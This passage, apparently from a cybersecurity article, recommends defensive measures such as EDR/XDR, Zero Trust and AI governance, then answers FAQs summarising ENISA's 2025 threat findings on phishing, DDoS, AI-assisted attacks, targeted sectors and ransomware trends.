Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) platforms provide essential visibility into advanced attacks that bypass traditional antivirus and firewall protections. These platforms enable behavioral analysis, threat hunting, and automated response to suspicious activities across endpoints, networks, and cloud environments.
Network segmentation and Zero Trust architecture implementation limit the impact of successful intrusions by restricting lateral movement and enforcing least-privilege access controls. Organizations should implement micro-segmentation, software-defined perimeters, and identity-based access controls that verify every connection attempt regardless of location or device.
AI governance frameworks must address both the security of AI systems and the use of AI in security operations. Organizations should implement AI supply chain security controls, model validation processes, and prompt injection protection while leveraging AI capabilities for threat detection, incident response, and security automation.
The NIST Cybersecurity Framework provides a comprehensive foundation for organizations developing risk-based cybersecurity programs that address the full spectrum of modern threats.
Frequently Asked Questions
What are the most significant cybersecurity threats identified in ENISA’s 2025 report?
The ENISA 2025 report identifies phishing as the dominant initial intrusion vector (about 60% of intrusions), followed by vulnerability exploitation (21.3%). By incident volume, DDoS dominates at 76.7% of all recorded incidents, and AI-enhanced social engineering campaigns target organizations worldwide.
How is artificial intelligence being used in cyberattacks according to ENISA 2025?
AI is being weaponized through jailbroken and uncensored large language models (WormGPT, FraudGPT), automated phishing campaigns, deepfake social engineering, and poisoned AI models. Over 80% of observed social engineering campaigns used AI assistance between September 2024 and February 2025.
Which sectors are most targeted by cybercriminals in 2025?
Public administration leads with 38.2% of incidents, followed by transport (7.5%), digital infrastructure and services (4.8%), finance (4.5%), and manufacturing (2.9%). These sectors represent critical infrastructure essential for societal functions.
What defense strategies does ENISA recommend against 2025 cyber threats?
ENISA recommends implementing phishing-resistant MFA, rapid patch management, supply chain security controls, endpoint detection and response (EDR/XDR), network segmentation, continuous monitoring, and AI governance frameworks to protect against evolving threats.
How has the ransomware landscape evolved in 2025 according to ENISA?
Ransomware has decentralized after law enforcement pressure, with new extortion techniques emerging alongside traditional encryption. Ransomware-as-a-Service (RaaS) continues proliferating, and attackers increasingly target supply chains and third-party service providers for maximum impact.